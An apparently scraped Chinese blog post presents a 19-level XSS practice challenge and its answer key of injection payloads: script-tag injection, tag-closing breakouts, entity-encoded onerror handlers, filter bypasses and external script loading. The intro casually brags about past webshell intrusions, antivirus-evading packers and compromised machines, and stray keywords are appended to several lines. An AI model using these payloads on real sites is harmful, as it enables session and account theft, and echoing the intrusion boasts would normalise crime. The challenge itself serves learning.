【19道XSS題目】不服來戰!

記得第一次接觸xss這個概念是在高中,那個時候和一個好基友經過黑客X檔案和黑客手冊。第一次接觸到了除了遊戲之外的電腦知識,而後知道了,原來電腦除了玩遊戲還能夠搞這些,今後兩人一發不可收拾的愛上了玩黑這方面的東西。javascript

如今想起來,高中時期是在08年左右,那個時候的網絡安全環境還蠻差。那個時候沒什麼計算機知識,跟着雜誌直接用工具跑都拿到了蠻多的webshell,後來學的多了,本身會寫一些殼過免殺,豔照門時候抓的肉雞那就不要說了,嘿嘿!前端

XSS具體的概念就不在這解釋了,作前端的童鞋們只要是稍微對安全這方面有過一點了解的,應該都是知道的。java

這裏有19道XSS的題目,網址是神通廣大的「QQ羣爸爸」給的。你們若是想加深對XSS這方面的瞭解,能夠來挑戰一下。看看能過幾關斬幾將!web

挑戰請搓下面網址:shell

https://xss.haozi.me/segmentfault

 答案在下面給到,主要的思路大概是如下幾種:安全

1.layload外部js網絡

2.繞過正則xss

3.閉合標籤工具

4.轉化編碼:10HEX,16HEX etc.

5.建立錯誤執行Js

---------------------------------------------------                  我是分割線                         答案在下面                  ---------------------------------------------------------------------

 

 

 

 

 

 

 

 

 

 

 

0x00:<script>alert(1)</script>

0x01:</textarea><script>alert(1)</script>

0x02:"><script>alert(1)</script>

0x03:<img src="" onerror=javascript:alert&#x28;&#x31;&#x29;>

0x04:<img src="" onerror=javascript:alert&#x28;&#x31;&#x29;>

0x05:--!><script>alert(1)</script>

0x06:type="image" src="xxx" onerror

         ="alert(1)"

0x07:<body onload=alert(1)    CRLF結尾

0x08:</style /><script>alert(1)</script>

0x09:https://www.segmentfault.com.haozi.me/j.js

0x0A:https://www.segmentfault.com.haozi.me/j.js

0x0B:<script src="https://www.segmentfault.com.haozi.me/j.js"></script>

0x0C:<scripscriptt src="https://www.segmentfault.com.haozi.me/j.js"></scripscriptt>

0x0D:

          alert(1);

          -->

0x0E:<ſcript src="https://www.segmentfault.com.haozi.me/j.js"></script>

0x0F:');alert('1

0x10:eval("alert(1)");

0x11:"),alert("1

0x12:

</script><script>alert(1);</script><script>

相關文章
相關標籤/搜索